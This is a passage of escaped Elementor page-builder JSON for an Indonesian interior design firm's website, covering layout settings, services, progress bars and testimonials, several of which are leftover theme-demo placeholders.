penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Prijonno Nugroho\",\"job\":\"Action Coach Jakarta\",\"testimonial\":\"Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/56947243_2426566684042502_6812443397089918976_n.jpg\",\"id\":4923,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"4b2f506\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"